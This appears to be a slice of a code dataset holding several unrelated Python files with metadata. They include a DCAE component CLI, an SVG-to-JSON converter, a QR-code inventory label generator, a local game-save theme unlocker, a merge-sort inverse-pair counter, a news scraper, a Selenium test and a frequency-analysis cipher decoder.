get_instances_as_rows(comp):\n \"\"\"Get all deployed running instances of a component plus details about\n those instances and return as a list of rows\"\"\"\n cname = comp[\"name\"]\n cver = comp[\"version\"]\n ctype = comp[\"component_type\"]\n\n instances = dis.get_healthy_instances(user, cname, cver)\n instances_status = [\"Healthy\"]*len(instances)\n instances_conns = [ format_resolve_results(resolve_name(consul_host, instance)) \\\n for instance in instances ]\n\n instances_defective = dis.get_defective_instances(user, cname, cver)\n instances_status += [\"Defective\"]*len(instances_defective)\n instances_conns += [\"\"]*len(instances_defective)\n\n instances += instances_defective\n\n return list(zip(instances, instances_status, instances_conns))\n\n # Generate grouped rows where a grouped row is (name, version, type, [instances])\n grouped_rows = [ (comp, get_instances_as_rows(comp)) for comp in comps ]\n\n # Display\n if deployed:\n def display_deployed(comp, instances):\n cname = comp[\"name\"]\n cver = comp[\"version\"]\n ctype = comp[\"component_type\"]\n\n click.echo(\"Name: {0}\".format(cname))\n click.echo(\"Version: {0}\".format(cver))\n click.echo(\"Type: {0}\".format(ctype))\n click.echo(create_table(('Instance', 'Status', 'Connection'), instances))\n click.echo(\"\")\n\n [ display_deployed(*row) for row in grouped_rows ]\n else:\n def format_row(comp, instances):\n return comp[\"name\"], comp[\"version\"], comp[\"component_type\"], \\\n util.format_description(comp[\"description\"]), \\\n util.get_status_string(comp), comp[\"modified\"], len(instances)\n\n rows = [ format_row(*grouped_row) for grouped_row in grouped_rows ]\n click.echo(create_table(('Name', 'Version', 'Type', 'Description',\n 'Status', 'Modified', '#Deployed'), rows))\n click.echo(\"\\nUse the \\\"--deployed\\\" option to see more details on deployments\")\n\n\n@component.command()\n@click.argument('component', metavar=\"name:version\")\n@click.pass_obj\ndef show(obj, component):\n '''Provides more information about a COMPONENT'''\n cname, cver = parse_input(component)\n catalog = obj['catalog']\n comp_spec = catalog.get_component_spec(cname, cver)\n\n click.echo(util.format_json(comp_spec))\n\n\n_help_dmaap_file = \"\"\"\nPath to a file that contains a json of dmaap client information. The structure of the json is expected to be:\n\n {\n : {..client object 1..},\n : {..client object 2..},\n ...\n }\n\nWhere \"client object\" can be for message or data router. 
The \"config_key\" matches the value of specified in the message router \"streams\" in the component specification.\n\nPlease refer to the documentation for examples of \"client object\".\n\"\"\"\n\ndef _parse_dmaap_file(dmaap_file):\n try:\n with open(dmaap_file, 'r+') as f:\n dmaap_map = json.load(f)\n dmaap.validate_dmaap_map_schema(dmaap_map)\n return dmaap.apply_defaults_dmaap_map(dmaap_map)\n except Exception as e:\n message = \"Problems with parsing the dmaap file. Check to make sure that it is a valid json and is in the expected format.\"\n raise DcaeException(message)\n\n\n_help_inputs_file = \"\"\"\nPath to a file that contains a json that contains values to be used to bind to configuration parameters that have been marked as \"sourced_at_deployment\". The structure of the json is expected to be:\n\n {\n : value,\n : value\n }\n\nThe \"parameter name\" is the value of the \"name\" property for the given configuration parameter.\n\"\"\"\n\ndef _parse_inputs_file(inputs_file):\n try:\n with open(inputs_file, 'r+') as f:\n inputs_map = json.load(f)\n # TODO: Validation of schema in the future?\n return inputs_map\n except Exception as e:\n message = \"Problems with parsing the inputs file. Check to make sure that it is a valid json and is in the expected format.\"\n raise DcaeException(message)\n\n\n_help_policy_file = \"\"\"\nPath to a file that contains a json of an (update/remove) Policy change.\nAll \"policies\" can also be specified.\nThe structure of the json is expected to be:\n\n{\n\"updated_policies\": [{\"policyName\": \"value\", \"\": \"\"},{\"policyName\": \"value\", \"\": \"\"}],\n\"removed_policies\": [{\"policyName\": \"value\", \"\": \"\"},{\"policyName\": \"value\", \"\": \"\"}],\n\"policies\": [{\"policyName\": \"value\", \"\": \"\"},{\"policyName\": \"value\", \"\": \"\"}]\n}\n\"\"\"\n\ndef _parse_policy_file(policy_file):\n try:\n with open(policy_file, 'r+') as f:\n policy_change_file = json.load(f)\n policy.validate_against_policy_schema(policy_change_file)\n return policy_change_file\n except Exception as e:\n click.echo(format(e))\n message = \"Problems with parsing the Policy file. Check to make sure that it is a valid json and is in the expected format.\"\n raise DcaeException(message)\n\n@component.command()\n@click.option('--external-ip', '-ip', default=None, help='The external IP address of the Docker host. Only used for Docker components.')\n@click.option('--additional-user', default=None, help='Additional user to grab instances from.')\n@click.option('--attached', is_flag=True, help='(Docker) dcae-cli deploys then attaches to the component when set')\n@click.option('--force', is_flag=True, help='Force component to run without valid downstream dependencies')\n@click.option('--dmaap-file', type=click.Path(resolve_path=True, exists=True, dir_okay=False),\n help=_help_dmaap_file)\n@click.option('--inputs-file', type=click.Path(resolve_path=True, exists=True, dir_okay=False),\n help=_help_inputs_file)\n@click.argument('component')\n@click.pass_obj\ndef run(obj, external_ip, additional_user, attached, force, dmaap_file, component,\n inputs_file):\n '''Runs latest (or specific) COMPONENT version. 
You may optionally specify version via COMPONENT:VERSION'''\n\n click.echo(\"Running the Component.....\")\n click.echo(\"\")\n\n cname, cver = parse_input(component)\n user, catalog = obj['config']['user'], obj['catalog']\n\n dmaap_map = _parse_dmaap_file(dmaap_file) if dmaap_file else {}\n inputs_map = _parse_inputs_file(inputs_file) if inputs_file else {}\n\n try:\n run_component(user, cname, cver, catalog, additional_user, attached, force,\n dmaap_map, inputs_map, external_ip)\n except DiscoveryNoDownstreamComponentError as e:\n message = \"Either run a compatible downstream component first or run with the --force flag to ignore this error\"\n raise DcaeException(message)\n except inputs.InputsValidationError as e:\n click.echo(\"ERROR: There is a problem. {0}\".format(e))\n click.echo(\"\")\n message = \"Component requires inputs. Please look at the use of --inputs-file and make sure the format is correct\"\n raise DcaeException(message)\n\n@component.command()\n@click.argument('component')\n@click.pass_obj\ndef undeploy(obj, component):\n '''Undeploy latest (or specific) COMPONENT version. You may optionally specify version via COMPONENT:VERSION'''\n cname, cver = parse_input(component)\n user, catalog = obj['config']['user'], obj['catalog']\n undeploy_component(user, cname, cver, catalog)\n\n\n@component.command()\n@click.argument('specification', type=click.Path(resolve_path=True, exists=True))\n@click.option('--additional-user', default=None, help='Additional user to grab instances from.')\n@click.option('--force', is_flag=True, help='Force component to run without valid downstream dependencies')\n@click.option('--dmaap-file', type=click.Path(resolve_path=True, exists=True, dir_okay=False),\n help=_help_dmaap_file)\n@click.option('--inputs-file', type=click.Path(resolve_path=True, exists=True, dir_okay=False),\n help=_help_inputs_file)\n@click.pass_obj\ndef dev(obj, specification, additional_user, force, dmaap_file, inputs_file):\n '''Set up component in development for discovery, use for local development'''\n user, catalog = obj['config']['user'], obj['catalog']\n\n dmaap_map = _parse_dmaap_file(dmaap_file) if dmaap_file else {}\n inputs_map = _parse_inputs_file(inputs_file) if inputs_file else {}\n\n with open(specification, 'r+') as f:\n spec = json.loads(f.read())\n try:\n dev_component(user, catalog, spec, additional_user, force, dmaap_map,\n inputs_map)\n except DiscoveryNoDownstreamComponentError as e:\n message = \"Either run a compatible downstream component first or run with the --force flag to ignore this error\"\n raise DcaeException(message)\n except inputs.InputsValidationError as e:\n click.echo(\"ERROR: There is a problem. {0}\".format(e))\n click.echo(\"\")\n message = \"Component requires inputs. Please look at the use of --inputs-file and make sure the format is correct\"\n raise DcaeException(message)\n\n\n@component.command()\n@click.argument('component')\n@click.pass_obj\ndef publish(obj, component):\n \"\"\"Pushes a COMPONENT to the public catalog\"\"\"\n name, version = parse_input(component)\n user, catalog = obj['config']['user'], obj['catalog']\n\n try:\n # Dependent data formats must be published first before publishing\n # component. 
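# --- Illustrative aside (not part of the original file) ---
# The --inputs-file option documented above binds values to component-spec
# parameters marked "sourced_at_deployment". A minimal example of writing
# such a file; the parameter names here are hypothetical, not from any real
# component spec, and the CLI invocation shape is approximate.
import json

example_inputs = {
    "threshold": 5,
    "downstream_host": "example.invalid",
}

with open("inputs.json", "w") as f:
    json.dump(example_inputs, f, indent=2)
# usage shape (approximate): component run --inputs-file inputs.json name:version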
Check that here\n unpub_formats = catalog.get_unpublished_formats(name, version)\n\n if unpub_formats:\n click.echo(\"ERROR: You must publish dependent data formats first:\")\n click.echo(\"\")\n click.echo(\"\\n\".join([\":\".join(uf) for uf in unpub_formats]))\n click.echo(\"\")\n return\n except MissingEntry as e:\n raise DcaeException(\"Component not found\")\n\n if catalog.publish_component(user, name, version):\n click.echo(\"Component has been published\")\n else:\n click.echo(\"ERROR: Component could not be published\")\n\n\n@component.command()\n@click.option('--update', is_flag=True, help='Updates a locally added component if it has not already been published')\n@click.argument('specification', type=click.Path(resolve_path=True, exists=True))\n@click.pass_obj\ndef add(obj, update, specification):\n \"\"\"Add Component to local onboarding catalog\"\"\"\n user, catalog = obj['config']['user'], obj['catalog']\n\n spec = load_json(specification)\n catalog.add_component(user, spec, update)\n\n\n@component.command()\n@click.option('--policy-file', type=click.Path(resolve_path=True, exists=True, dir_okay=False), help=_help_policy_file)\n@click.argument('component')\n@click.pass_obj\ndef reconfig(obj, policy_file, component):\n \"\"\"Reconfigure COMPONENT for Policy change.\n Modify Consul KV pairs for ('updated_policies', 'removed_policies', and 'policies') for Policy change event,\n Execute the reconfig script(s) in the Docker container\"\"\"\n\n click.echo(\"Running Component Reconfiguration.....\")\n click.echo(\"\")\n\n # Read and Validate the policy-file\n policy_change_file = _parse_policy_file(policy_file) if policy_file else {}\n\n if not (policy_change_file):\n click.echo(\"ERROR: For component 'reconfig', you must specify a --policy-file\")\n click.echo(\"\")\n return\n else:\n # The Component Spec contains the Policy 'Reconfig Script Path/ScriptName'\n cname, cver = parse_input(component)\n catalog = obj['catalog']\n comp_spec = catalog.get_component_spec(cname, cver)\n\n # Check if component is running and healthy\n active_profile = profiles.get_profile()\n consul_host = active_profile.consul_host\n service_name = os.environ[\"SERVICE_NAME\"]\n if dis.is_healthy(consul_host, service_name):\n pass\n else:\n click.echo(\"ERROR: The component must be running and healthy. 
It is not.\")\n click.echo(\"\")\n return\n\n try:\n policy_reconfig_path = comp_spec['auxilary']['policy']['script_path']\n except KeyError:\n click.echo(\"ERROR: Policy Reconfig Path (auxilary/policy/script_path) is not specified in the Component Spec\")\n click.echo(\"\")\n return\n\n kvUpdated = dis.policy_update(policy_change_file, dis.default_consul_host())\n\n if kvUpdated:\n active_profile = profiles.get_profile()\n docker_logins = dis.get_docker_logins()\n\n command = dis.build_policy_command(policy_reconfig_path, policy_change_file, dis.default_consul_host())\n\n # Run the Policy Reconfig script\n client = du.get_docker_client(active_profile, docker_logins)\n du.reconfigure(client, service_name, command)\n else:\n click.echo(\"ERROR: There was a problem updating the policies in Consul\")\n click.echo(\"\")\n return\n\n click.echo(\"\")\n click.echo(\"The End of Component Reconfiguration\")\n","sub_path":"dcae-cli/dcae_cli/commands/component/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":16690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"441925622","text":"import json\nimport lxml.etree as et\nimport click\nimport os\nimport shutil\nimport warnings\nfrom collections import OrderedDict\n\n\n@click.command()\n@click.argument('files', nargs=-1)\n@click.option('--kind')\ndef cmd_convert(files, kind):\n files = sorted(files)\n output = {}\n fail_dir = 'symbols_too_large'\n \n for file in files:\n if not os.path.exists(file):\n continue\n try:\n with open(file, 'rb') as fp:\n root = et.parse(fp)\n except:\n raise click.ClickException('Failed to read {0}'.format(file))\n \n if os.stat(file).st_size > 1536:\n click.echo('File too large for inclusion {0}'.format(file), err=True)\n fail_dir_extended = fail_dir+'/'+os.path.dirname(file)\n if not os.path.exists(fail_dir_extended):\n os.makedirs(fail_dir_extended)\n shutil.move(file, fail_dir+'/'+file)\n continue\n \n el = root.find('a:path', namespaces={'a':'http://www.w3.org/2000/svg'})\n path = el.attrib['d']\n nickname = os.path.splitext(os.path.basename(file))[0] \\\n .replace('_', '-').replace(' ', '-') \\\n .replace('_Copy', '').replace('svg', '') \\\n .replace('--', '-').lower()\n for i in range(0, 9):\n nickname = nickname.replace('({})'.format(i), '').strip('- ')\n key = '{0}-{1}'.format(kind, nickname)\n key = key\n output[key] = OrderedDict([\n ('name', nickname.replace('-', ' ').title()),\n ('tags', [kind]),\n ('category', kind.capitalize()),\n ('path', path),\n ('bbox', dict(x=0,y=0,x2=512,y2=512,width=512,height=512,cx=256,cy=256)),\n ('scale', 0.046875),\n ('strokeWidth', 6),\n ])\n click.echo(json.dumps(output, indent=True))\n\nif __name__ == '__main__':\n cmd_convert()\n","sub_path":"jackson/svg2json.py","file_name":"svg2json.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"38017548","text":"# import pyqrcode and Bitly API for link shortening\nimport pyqrcode\nimport string\nimport bitly_api\n\n# imports for handling latex and pdflatex\nfrom os import listdir, unlink, remove, makedirs, rename\nfrom os.path import isfile, join, isdir\nfrom subprocess import Popen\nfrom shlex import split\n\n# Google API authentication and gspread imports\nimport json\nimport gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\n\n# import configuration parsing tools\nimport ConfigParser, argparse\n\n# open config file\nparser = 
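# --- Illustrative aside (not part of the original file) ---
# svg2json above normalizes file names with a chain of str.replace calls plus
# a loop that strips "(0)".."(8)" counters. The same cleanup can be done in a
# couple of regex passes, which also catches any "(N)" counter:
import re

def nickname_from_filename(stem):
    s = stem.replace('_', '-').replace(' ', '-').lower()
    s = re.sub(r'\(\d+\)', '', s)   # drop duplicate-file counters
    s = re.sub(r'-{2,}', '-', s)    # collapse runs of dashes
    return s.strip('- ')

assert nickname_from_filename('My_Icon (3)') == 'my-icon'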
argparse.ArgumentParser()\nparser.add_argument(\"config\")\nargs = parser.parse_args()\ncfile = args.config\n\nconfig = ConfigParser.ConfigParser()\nconfig.read(cfile)\n\n# authenticate Google API and gspread\njson_filename = config.get('Google login', 'json_oauth2_filename')\njson_key = json.load(open(json_filename))\nscope = ['https://spreadsheets.google.com/feeds']\noauth2_credentials = ServiceAccountCredentials.from_json_keyfile_name(json_filename, scope)\ngc = gspread.authorize(oauth2_credentials)\nprint('Google API authenticated')\nprint('----------------------------------------------------')\n\n# authenticate Bitly API\nbitly_username = config.get('Bitly login', 'bitly_username')\nbitly_access_key = config.get('Bitly login', 'bitly_access_key')\nbitly = bitly_api.Connection(bitly_username, bitly_access_key)\nprint('Bitly API authenticated')\nprint('----------------------------------------------------')\n\n# open spreadsheet\ninventory = gc.open('LARICS Inventar')\nequipment_sheet = inventory.worksheet('Popis opreme')\nqr_codes_sheet = inventory.worksheet('QR codes')\nprint('Spreadsheets opened')\nprint('----------------------------------------------------')\n\n# get data and data length\nequipment_data = equipment_sheet.get_all_records()\nqr_codes_data = qr_codes_sheet.get_all_records()\ndata_length = min(len(qr_codes_data), len(equipment_data))\n\n# obtain QR code links, check if updated and already printed\nlinks = []\nfor i in range(data_length):\n\tif equipment_data[i]['Osvjezeno'].upper() == 'DA' and not equipment_data[i]['Isprintano'].upper() == 'DA' :\n\t\tlinks.append(qr_codes_data[i]['URL'])\n\n# make sure QRCodes directory exists\ntry: \n makedirs('./QRCodes/')\nexcept OSError:\n if not isdir('./QRCodes/'):\n raise\n# process and shorten links and generate QR code images\nlink_count = 0\nfor link in links:\n\tlink_split = link.split('=')\n\tname_from_sheet = link_split[1].split('&')[0]\n\tid_from_sheet = link_split[3].split('&')[0]\n\tname_from_sheet = string.replace(name_from_sheet, '+','_')\n\tname_from_sheet = string.replace(name_from_sheet, '/','-')\n\tname_from_sheet = string.replace(name_from_sheet, ',','')\n\tname_from_sheet = string.replace(name_from_sheet, '.','')\n\tif id_from_sheet == '' or name_from_sheet == '':\n\t\tlink_count = link_count + 1\n\t\tprint('Done '+str(link_count)+'/'+str(len(links))+'\\r')\n\t\tcontinue\n\tif len(id_from_sheet)==1:\n\t\tid_from_sheet = '00'+id_from_sheet\n\telif len(id_from_sheet)==2:\n\t\tid_from_sheet = '0'+id_from_sheet\n\tname = \"./QRCodes/\"+id_from_sheet+'_'+name_from_sheet+\".png\"\n\tcurrent_cell = qr_codes_sheet.find(link)\n\tshort_link_cell = qr_codes_sheet.cell(current_cell.row, current_cell.col+2)\n\tif short_link_cell.value:\n\t\tshort_url = short_link_cell.value\n\telse:\n\t\tshort_url = bitly.shorten(link)['url']\n\t\tqr_codes_sheet.update_cell(short_link_cell.row, short_link_cell.col, short_url)\n\turl = pyqrcode.create(short_url)\t\n\turl.png(name, scale=6)\n\tlink_count = link_count + 1\n\nprint('Done '+str(link_count)+'/'+str(len(links))+'\\r')\nprint('Links shortened')\nprint('----------------------------------------------------')\n\n# fetch QR code filenames and sort them\nonlyfiles = [f for f in listdir('QRCodes') if isfile(join('QRCodes',f))]\nonlyfiles.sort()\n\n# assign files to pages, n number of files per page\nn = 40\npages = []\nfor i in range(0, len(onlyfiles), n):\n\tchunk = onlyfiles[i:i+n]\n\tpages.append(chunk)\n\n# last page may not be full, check the length\nif 
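# --- Illustrative aside (not part of the original file) ---
# The slicing loop above packs QR files into pages of n entries (and the
# script caches each shortened URL back into the sheet so Bitly is only
# called once per link). The chunking idea as a reusable generator:
def chunks(items, size):
    for i in range(0, len(items), size):
        yield items[i:i + size]

assert list(chunks(list(range(5)), 2)) == [[0, 1], [2, 3], [4]]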
len(pages)>1:\n\tprint(pages)\n\toverflow = len(pages[-1])\nelse:\n\tprint(pages)\n\toverflow = len(pages[0])\n\n\n# read template for a full page\nwith open (\"template_full.tex\", \"r\") as template_full_file:\n\ttemplate_full = template_full_file.read()\n\n# not full page template\nwith open (\"template_empty.tex\", \"r\") as template_empty_file:\n\ttemplate_empty = template_empty_file.read()\n\n# create empty dictionary\ndictionary = {}\nfor i in range(80):\n\tdictkey = 'entry'+str(i+1)\n\tdictvalue = ' '\n\tdictionary[dictkey] = dictvalue\n\n# fill dictionary with a proper amount of entries\nfor i in range(overflow):\n\tdictkey_odd = 'entry' + str(i*2+1)\n\tdictkey_even = 'entry' + str(i*2+2)\n\tdictvalue_odd = r'\\includegraphics[height=2.85 cm]{%(filename'+str(i+1)+')s}'\n\tdictvalue_even = '%(name' + str(i+1) +r')s INV\\_BR:%(ib'+str(i+1)+')s'\n\tdictionary[dictkey_odd] = dictvalue_odd\n\tdictionary[dictkey_even] = dictvalue_even\n\n# fill template for empty page\ntemplate_empty = template_empty%dictionary\n\n# process pages\npagecount = 0\nto_compile = []\nfor page in pages:\n\tdictionary = {}\n\tfilecount = 0\n\tfor filename in page:\n\t\tdictkey_filename = 'filename'+str(filecount+1)\n\t\tdictvalue_filename = 'QRCodes/'+str(filename)\n\t\tdictkey_ib = 'ib'+str(filecount+1)\n\t\tdictkey_name = 'name'+str(filecount+1)\n\t\tdictvalue_ib = filename.split('_')[0]\n\t\twhile dictvalue_ib[0]=='0':\n\t\t\tdictvalue_ib = dictvalue_ib[1:]\n\t\tdictionary[dictkey_filename] = dictvalue_filename\n\t\tdictionary[dictkey_ib] = dictvalue_ib\n\t\tname = filename.split('_')[1:]\n\t\tname[-1] = name[-1].split('.')[0]\n\t\tname_to_write = ''\n\t\tword_count = 0\n\t\tfor word in name:\n\t\t\tname_to_write = name_to_write + ' ' + word\n\t\t\tword_count = word_count + 1\n\t\tname_to_write.replace('\\xc5', 'z')\n\t\tname_to_write.replace('\\xc4', 'c')\n\t\tif len(name_to_write) > 35:\n\t\t\tname_to_write = name_to_write[0:34]\n\t\tdictionary[dictkey_name] = name_to_write\n\t\tfilecount = filecount + 1\n\tif len(page) == n:\n\t\tto_write = template_full%dictionary\n\telse:\n\t\tto_write = template_empty%dictionary\n\ttex_filename = 'page'+str(pagecount+1)+'.tex'\n\twith open (tex_filename, 'w') as writefile:\n\t\twritefile.write(to_write)\n\tto_compile.append(tex_filename)\n\tpagecount = pagecount + 1\n\n# compile tex files\nfor texfile in to_compile:\n\tcommand = 'pdflatex ' + texfile\n\tproc = Popen(split(command))\n\tproc.communicate()\n\n# cleanup\ntry: \n makedirs('./ToPrint/')\nexcept OSError:\n if not isdir('./ToPrint/'):\n raise\nnames = []\nfor texfile in to_compile:\n\t[name,ext] = texfile.split('.')\n\tnames.append(name)\n\nlatex_output_files = []\nfor filename in listdir('.'):\n\tfor name in names:\n\t\tif filename.startswith(name):\n\t\t\tlatex_output_files.append(filename)\n\nfor output_file in latex_output_files:\n\tif output_file.endswith('.pdf'):\n\t\trename(output_file, './ToPrint/'+output_file)\n\telse:\n\t\tremove(output_file)\n","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":6718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"164301071","text":"from numpy import int16, zeros\n\n#подсчет количества уникальных операций\ndef count_unique(matrix):\n\tstr_matrix_unique_elements = ''\n\tfor i in range(len(matrix)):\n\t\tfor j in range(len(matrix[i])):\n\t\t\tif not matrix[i][j] in str_matrix_unique_elements:\n\t\t\t\tstr_matrix_unique_elements = str_matrix_unique_elements + matrix[i][j]\n\treturn 
int(len(str_matrix_unique_elements)/2)\n\t\n# count the operations that do not occur in the rows\ndef count_diff(matrix, K, len_matrix):\n\tres_list = []\n\tres_dict = {}\n\tfor i in range(len(matrix)):\n\t\tif i == len_matrix:\n\t\t\tbreak\n\t\tres_list.append({(i, j): K - int(len(set(matrix[i]).symmetric_difference(set(matrix[j])))) for j in range(i , len_matrix) if i != j})\n\tfor i in res_list:\n\t\tif(type(i) == dict):\n\t\t\tres_dict.update(i)\n\treturn res_dict\n\n# format the output as a square matrix\ndef matrix_output(matrix, len_matrix):\n\tresult_matrix = zeros((len_matrix,len_matrix), dtype=int16)\n\tfor i in range(len_matrix):\n\t\tfor j in range(len_matrix):\n\t\t\tif (i, j) in matrix.keys():\n\t\t\t\tresult_matrix[i,j] = matrix[(i, j)]\n\t\t\t\tresult_matrix[j, i] = matrix[(i, j)]\n\treturn result_matrix\n\nif __name__ == '__main__':\n\tprint(\"GKS.py\")","sub_path":"gks.py","file_name":"gks.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"225627093","text":"import winreg\r\ntry:\r\n    invaxionReg=winreg.OpenKey(winreg.HKEY_CURRENT_USER,r\"SOFTWARE\\Aquatrax\\INVAXION\",0,winreg.KEY_ALL_ACCESS)\r\nexcept FileNotFoundError:\r\n    print(\"No INVAXION data found! Is INVAXION installed on this computer?\\n未找到音灵的游戏数据! 此电脑上安装了音灵吗?\")\r\n    input(\"Press any key to continue.../按任意键继续……\")\r\n    exit()\r\ntry:\r\n    i=0\r\n    while True:\r\n        if winreg.EnumValue(invaxionReg,i)[0].find(\"Offline_PlayerThemeList\")!=-1:\r\n            global index\r\n            index=i\r\n            break\r\n        i+=1\r\nexcept WindowsError:\r\n    print(\"No INVAXION data found! Have you played INVAXION online before April 7th, 2021?\\nYou can download a save file by visiting https://share4nothing.ml/Share/\\n未找到音灵的游戏数据! 
是否在停服前进行过在线游戏?\\n你可以通过访问https://share4nothing.ml/Share/来获取一份存档!\")\r\n    input(\"Press any key to continue.../按任意键继续……\")\r\n    exit()\r\nwinreg.SetValueEx(invaxionReg,winreg.EnumValue(invaxionReg,index)[0],0,winreg.REG_BINARY,b'[{\"themeId\":1},{\"themeId\":2},{\"themeId\":3},{\"themeId\":4},{\"themeId\":5},{\"themeId\":6},{\"themeId\":7},{\"themeId\":8},{\"themeId\":9},{\"themeId\":10},{\"themeId\":11},{\"themeId\":12},{\"themeId\":13},{\"themeId\":14}]\\x00')\r\nwinreg.CloseKey(invaxionReg)\r\nprint(\"Unlocked/解锁成功\")\r\ninput(\"Press ENTER to continue.../按回车键继续……\")\r\n\r\n","sub_path":"Unlock-Theme.py","file_name":"Unlock-Theme.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"141794452","text":"\"\"\"\nInverse pairs in an array\nProblem: two numbers in an array form an inverse pair when the earlier number is greater than the later one.\nGiven an array, count the total number of inverse pairs it contains.\n Approach: 1. compare each element with every later one, O(n^2) time\n 2. merge sort, O(nlogn) time and O(n) space:\n    split the array, count the qualifying pairs while comparing the halves, then merge them into sorted order with two pointers\n\"\"\"\nimport copy\n\n\ndef get_inverse_pairs(nums):\n    if not nums:\n        return 0\n    start, end = 0, len(nums) - 1\n    tmp = copy.deepcopy(nums)\n    return inverse_pairs(tmp, start, end)\n\n\ndef inverse_pairs(tmp, start, end):\n    if start == end:\n        return 0\n    mid = (end - start) // 2\n    left = inverse_pairs(tmp, start, start + mid)\n    right = inverse_pairs(tmp, start + mid + 1, end)\n\n    count = 0\n    l_right, r_right = start + mid, end\n    t = []\n    while l_right >= start and r_right >= start + mid + 1:\n        if tmp[l_right] > tmp[r_right]:\n            t.append(tmp[l_right])\n            count += (r_right - mid - start)\n            l_right -= 1\n        else:\n            t.append(tmp[r_right])\n            r_right -= 1\n    while l_right >= start:\n        t.append(tmp[l_right])\n        l_right -= 1\n    while r_right >= start + mid + 1:\n        t.append(tmp[r_right])\n        r_right -= 1\n    tmp[start:end + 1] = t[::-1]\n    return count + left + right\n","sub_path":"InversePairs.py","file_name":"InversePairs.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"444646474","text":"# import modules\nimport urllib.request\nfrom bs4 import BeautifulSoup\nimport time\n\n# fetch the list of articles\nurl = 'https://news.naver.com/main/home.nhn'\nhtml = urllib.request.urlopen(url)\nsoup = BeautifulSoup(html,'html.parser')\n\nresults = soup.select('.mlist2.no_bg a') #strong\n\nwith open('test.txt','w',encoding='utf-8') as fp:\n\tfp.write('')\n\nfor result in results:\n\t# fetch the article\n\t# print(result.attrs['href'])\n\turl_article = result.attrs['href']\n\thtml = urllib.request.urlopen(url_article)\n\tsoup_article = BeautifulSoup(html,'html.parser')\n\tcontent = soup_article.select_one('#articleBodyContents')\n\t# print(content.contents)\n\t\n\t# clean up the content\n\toutput = ''\n\tfor item in content.contents:\n\t\tstripped = str(item).strip()\n\t\tif stripped == '':\n\t\t\tcontinue\n\t\tif stripped[0] not in ['<','/']:\n\t\t\toutput += str(item).strip()\n\twcontent = output.replace('본문 내용TV플레이어','')\n\tprint(wcontent)\n\tprint('-'*70)\n\ttime.sleep(1)\n\twith open('test.txt','a',encoding='utf-8') as fp:\n\t\tfp.write(wcontent)","sub_path":"lesson109.py","file_name":"lesson109.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"227127243","text":"# coding=utf-8\nimport unittest,time\nfrom common.browser_engine import BrowserEngine\nfrom testsuites.auto_testcase.Crm_Case.ordercare import *\nfrom testsuites.auto_testcase.Crm_Case.vipcare import *\n\n# anniversary care test\nclass 
Crm_HomePage(unittest.TestCase):\n def setUp(self):\n drivers=BrowserEngine(object)\n self.lcs=drivers.open_browser(self)\n\n def test_crmhomepage(self):\n Vip_Care(self.lcs).vip_timecare_type(\"周岁礼\")\n Vip_Care(self.lcs).time_care_common(2)\n self.lcs.close()\n\n def tearDown(self):\n self.lcs.quit()\n time.sleep(5)\nif __name__=='__main__':\n unittest.main()","sub_path":"testsuites/custom_function/Crm_Function/vipcare/test_year_care.py","file_name":"test_year_care.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"570023072","text":"# Use frequency analysis to find the key to ciphertext.txt,\n# and then decode it.\n\n# Your code here\ndef letter_count(text):\n \"\"\"\n @params text is string of any length\n\n letter_count takes a string and returns a dictionary of the count of each specific\n character in the following format: {\"A\": 54, \"B\": 12, ...}\n \"\"\"\n\n # the count does not include the following characters\n ignore = '\" : ; , . - + = / \\ | [ ] { } ( ) * ^ & ? ! \\''.split(\" \")\n ignore.extend([\" \", \"\\n\"])\n\n # counting code\n counts = {}\n for i in text:\n if i not in counts and i not in ignore:\n counts[i] = 0\n if i not in ignore:\n counts[i] += 1\n\n # return the dictionary\n return counts\n\n\ndef readfile(filename):\n # reads in a file and returns the text as a whole block\n with open(filename) as f:\n text = f.read()\n return text\n\n\ndef file_decode(filename):\n \"\"\"\n @params filename is a string filename relative to the root of the project,\n or wherever the terminal root is that's runnign the program\n\n file_decode reads in a file that is encoded with a simple caesar cipher, where\n individual letters are mapped 1:1 to another distinct letter in the alphabet, and\n decodes it, returning a string of the whole decoded file\n\n this function assumes all letters in the file are uppercase and that symbols\n and spaces in the file are not encoded\n \"\"\"\n\n # an array listing the letters of the english language in order of relative frequency\n general_frequency = [\n \"E\", \"T\", \"A\", \"O\", \"H\", \"N\", \"R\", \"I\", \"S\", \"D\", \"L\", \"W\", \"U\", \"G\", \"F\", \"B\", \"M\", \"Y\", \"C\", \"P\", \"K\", \"V\", \"Q\", \"J\", \"X\", \"Z\"]\n\n # read in the file\n text = readfile(filename)\n # store a count of the letters into a dictionary d\n d = letter_count(text)\n # convert dictionary elements into an array of tuples\n input_frequency = [item_tuple for item_tuple in d.items()]\n # sort the array based on frequency (second tuple element) from high to low\n input_frequency.sort(key=lambda e: e[1], reverse=True)\n # map the sorted list of tuples into a sorted array of just the letters (first tuple element)\n input_frequency = [x for x, y in input_frequency]\n\n \"\"\"\n This array should, with a *high probability* of correctness, map 1:1 with the\n corresponding *decoded* letter in general_frequency! 
